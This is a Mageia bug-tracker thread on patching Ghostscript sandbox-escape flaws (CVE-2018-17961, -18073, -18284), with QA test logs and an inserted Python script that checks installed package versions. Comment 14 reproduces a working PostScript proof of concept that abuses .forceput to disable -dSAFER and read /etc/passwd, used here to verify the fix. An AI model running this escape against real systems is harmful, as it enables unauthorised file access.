Bug 23659 - ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Summary: ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 6
Hardware: All
OS: Linux
Priority: Normal
Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2018-10-09 21:58 CEST by David Walser
Modified: 2018-10-19 20:37 CEST (History)

See Also:
Source RPM: ghostscript-9.24-8.mga7.src.rpm
CVE: CVE-2018-17961, CVE-2018-18073, CVE-2018-18284
Status comment:



Description David Walser 2018-10-09 21:58:03 CEST
A security issue fixed upstream in Ghostscript has been announced:
https://www.openwall.com/lists/oss-security/2018/10/09/4

The commits that fixed the issue are linked from the message above.

Mageia 6 is also affected.
David Walser 2018-10-09 21:58:12 CEST

Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2018-10-10 00:36:18 CEST
Bug 23526, our previous update, didn't mention:
CVE-2018-11645
CVE-2018-16585
CVE-2018-17183

Ubuntu has issued advisories for those on September 19 and October 1:
https://usn.ubuntu.com/3768-1/
https://usn.ubuntu.com/3773-1/
Comment 2 Marja Van Waes 2018-10-10 06:10:46 CEST
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Also CC'ing two committers.

CC: (none) => marja11, nicolas.salguero, smelror
Assignee: bugsquad => pkg-bugs

Comment 3 Nicolas Salguero 2018-10-10 15:12:08 CEST
Suggested advisory:
========================

The updated packages fix many bugs and a security vulnerability:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/09/4
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.mga6
ghostscript-dvipdf-9.25-1.mga6
ghostscript-common-9.25-1.mga6
ghostscript-X-9.25-1.mga6
ghostscript-module-X-9.25-1.mga6
lib(64)gs9-9.25-1.mga6
lib(64)gs-devel-9.25-1.mga6
lib(64)ijs1-0.35-140.mga6
lib(64)ijs-devel-0.35-140.mga6
ghostscript-doc-9.25-1.mga6

from SRPMS:
ghostscript-9.25-1.mga6.src.rpm

Status: NEW => ASSIGNED
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)

Nicolas Salguero 2018-10-10 15:12:40 CEST

Assignee: pkg-bugs => qa-bugs

Comment 4 David Walser 2018-10-10 16:19:13 CEST
What about Comment 1?

Keywords: (none) => feedback

Comment 5 Nicolas Salguero 2018-10-10 16:40:57 CEST
(In reply to David Walser from comment #4)
> What about Comment 1?

According to MITRE:
- CVE-2018-11645: Ghostscript before 9.21rc1
- CVE-2018-16585: Ghostscript before 9.24
- CVE-2018-17183: Ghostscript before 9.25 but the commit linked to that CVE was already in our ghostscript-9.24 package.
Comment 6 David Walser 2018-10-10 17:40:05 CEST
Thanks!

Keywords: feedback => (none)

Comment 7 David Walser 2018-10-11 23:02:01 CEST
One more commit is necessary:
https://www.openwall.com/lists/oss-security/2018/10/11/3

Keywords: (none) => feedback

Comment 8 David Walser 2018-10-11 23:05:57 CEST
And yet another needed commit with a new CVE:
https://www.openwall.com/lists/oss-security/2018/10/10/12

Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073

Comment 9 Nicolas Salguero 2018-10-12 09:49:54 CEST
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.1.mga6
ghostscript-dvipdf-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
ghostscript-X-9.25-1.1.mga6
ghostscript-module-X-9.25-1.1.mga6
lib(64)gs9-9.25-1.1.mga6
lib(64)gs-devel-9.25-1.1.mga6
lib(64)ijs1-0.35-140.1.mga6
lib(64)ijs-devel-0.35-140.1.mga6
ghostscript-doc-9.25-1.1.mga6

from SRPMS:
ghostscript-9.25-1.1.mga6.src.rpm
Nicolas Salguero 2018-10-12 09:50:51 CEST

Keywords: feedback => (none)

Comment 10 Len Lawrence 2018-10-12 13:02:15 CEST
Mageia 6, x86_64
Topped up the pre-update packages.

Before update:

CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/10/12
$ gs -dSAFER -sDEVICE=ppmraw
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit)
[...]
null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
GS>quit

Quoting the reference above:
"Once you have a reference to forceput, you can do anything you like, see
the exploit for CVE-2018-18073 as an example of abusing forceput to get
arbitrary filesystem access."
I could not find that exploit but updating solved the problem.

Waiting for the mirrors to sync.  Tested the earlier update.  When the new files appear I will run through the same tests again and report any differences in behaviour.
After the first update you can access the error stack safely:
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--]
GS>

Ran a few simple tests of gs.
Displayed a postscript file.
$ gs abc-0.ps
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Querying operating system for font files...
Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular.
Can't find (or can't open) font file BorzoiRegular.
Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done.
>>showpage, press <return> to continue<<

GS>quit

LibreOffice has ghostscript support.
The same file displayed OK with that.
Browsed an e-book pdf file with gs, hitting return to turn the pages.  On quit it insisted on flicking through the rest of the 832 pages.

Converted a dvi file to a pdf.
$ dvipdf refcard.dvi refcard.pdf
dvips: Font cmbx10 at 13824 not found; scaling 600 instead.
dvips: Such scaling will generate extremely poor output.
Page 1 may be too complex to print
Page 2 may be too complex to print
Page 5 may be too complex to print
Page 6 may be too complex to print
Warning:  no %%Page comments generated.

In fact it reproduced perfectly in okular - no loss of quality.

Looks OK for 64-bits.

CC: (none) => tarazed25

Comment 11 Len Lawrence 2018-10-13 11:24:52 CEST
CVE-2018-18073 has reserved status; no details of possible exploits available.

Passing it on.

Whiteboard: (none) => MGA6-64-OK

Comment 12 David Walser 2018-10-17 00:54:12 CEST
Ugh, another commit is needed for CVE-2018-18284:
https://www.openwall.com/lists/oss-security/2018/10/16/2

Can we add it in?
Comment 13 Nicolas Salguero 2018-10-17 09:39:28 CEST
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

1Policy operator gives access to .forceput. (CVE-2018-18284)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
https://www.openwall.com/lists/oss-security/2018/10/16/2
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
lib(64)gs9-9.25-1.2.mga6
lib(64)gs-devel-9.25-1.2.mga6
lib(64)ijs1-0.35-140.2.mga6
lib(64)ijs-devel-0.35-140.2.mga6
ghostscript-doc-9.25-1.2.mga6

from SRPMS:
ghostscript-9.25-1.2.mga6.src.rpm
Nicolas Salguero 2018-10-17 09:40:03 CEST

CVE: (none) => CVE-2018-17961, CVE-2018-18073, CVE-2018-18284
Summary: ghostscript new security issue CVE-2018-17961 and CVE-2018-18073 => ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284

Nicolas Salguero 2018-10-17 09:41:01 CEST

Whiteboard: MGA6-64-OK => (none)

Comment 14 Len Lawrence 2018-10-17 10:04:32 CEST
ghostscript-9.25-1.1.mga6

CVE-2018-18284

Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash)
GS>quit

The new version is not on the mirrors yet.  Later.
Comment 15 Len Lawrence 2018-10-17 18:41:36 CEST
Updated the packages.
$ rpm -qa | grep ghostscript
ghostscript-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
Error: /undefined in .policyprocs
Operand stack:
   --dict:963/1684(ro)(G)--   SAFER   false   --dict:0/0(L)--   --dict:0/0(L)--   --dict:963/1684(ro)(G)--   (ignored)   SAFER   false
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   %loop_continue   --nostringval--   --nostringval--   false   1   %stopped_push   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--
Dictionary stack:
   --dict:963/1684(ro)(G)--   --dict:0/20(G)--   --dict:79/200(L)--
Current allocation mode is local
Last OS error: No such file or directory
Current file position is 34

Any further attempts to use systemdict are thwarted in the same way.
Good result.

Ran simple tests again.  Printed a postscript file.  It looks fine.

Whiteboard: (none) => MGA6-64-OK
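Comment 15 checks the installed build by reading `rpm -qa` output by eye. As an added example (not part of this bug report or of Mageia's tooling), the Python below does the same check mechanically: it parses `rpm -qa` lines and compares each ghostscript package against the 9.25-1.2.mga6 build from the advisory in Comment 13, using rpm's own version-ordering rules so that 1.1.mga6 correctly sorts below 1.2.mga6 and 1.mga6 below 1.1.mga6. The package set and the sample listing are constructed from this bug; epochs are assumed absent, as `rpm -qa` prints them.

```python
import itertools
import re

# Fixed build from the advisory in Comment 13 (libijs has its own version and is left out).
FIXED_VERSION, FIXED_RELEASE = "9.25", "1.2.mga6"
GS_PACKAGES = {"ghostscript", "ghostscript-common", "ghostscript-X", "ghostscript-module-X",
               "ghostscript-dvipdf", "ghostscript-doc", "libgs9", "lib64gs9",
               "libgs-devel", "lib64gs-devel"}
_TOKEN = re.compile(r"\d+|[A-Za-z]+|~")   # rpm splits on everything else


def rpmvercmp(a, b):
    """rpm's label comparison: -1 if a < b, 0 if equal, 1 if a > b. Digit runs compare
    numerically and outrank alpha runs; '~' sorts before anything, even end of string."""
    for x, y in itertools.zip_longest(_TOKEN.findall(a), _TOKEN.findall(b)):
        if x == "~" and y == "~":
            continue
        if x == "~" or y == "~":           # pre-release marker loses to anything else
            return -1 if x == "~" else 1
        if x is None or y is None:         # one string ran out: the longer one is newer
            return -1 if x is None else 1
        xn, yn = x.isdigit(), y.isdigit()
        if xn != yn:                       # numeric segment always beats alpha segment
            return 1 if xn else -1
        if xn:
            x, y = int(x), int(y)          # numeric compare ignores leading zeros
        if x != y:
            return 1 if x > y else -1
    return 0


def check_installed(rpm_qa_output):
    """Map each ghostscript package in `rpm -qa` output to 'fixed' or 'vulnerable'."""
    status = {}
    for line in rpm_qa_output.split():
        name, version, release = line.rsplit("-", 2)   # rpm -qa prints name-version-release
        if name in GS_PACKAGES:
            rc = rpmvercmp(version, FIXED_VERSION) or rpmvercmp(release, FIXED_RELEASE)
            status[name] = "fixed" if rc >= 0 else "vulnerable"
    return status


# Constructed sample: the listing from Comment 15 plus one package left at the 1.1 build.
SAMPLE = """ghostscript-9.25-1.2.mga6 ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6 ghostscript-common-9.25-1.1.mga6 lib64gs9-9.25-1.2.mga6"""

if __name__ == "__main__":
    print(check_installed(SAMPLE))
```

On a real host, feed it `subprocess.run(["rpm", "-qa"], capture_output=True, text=True).stdout` instead of SAMPLE.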

Comment 16 Thomas Andrews 2018-10-17 22:45:26 CEST
Looks good to me, after Len's tests. Validating. Correct (I think) advisory suggestion in Comment 13.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

Thomas Backlund 2018-10-19 18:45:23 CEST

Keywords: (none) => advisory
CC: (none) => tmb

Comment 17 Mageia Robot 2018-10-19 20:37:31 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0408.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED
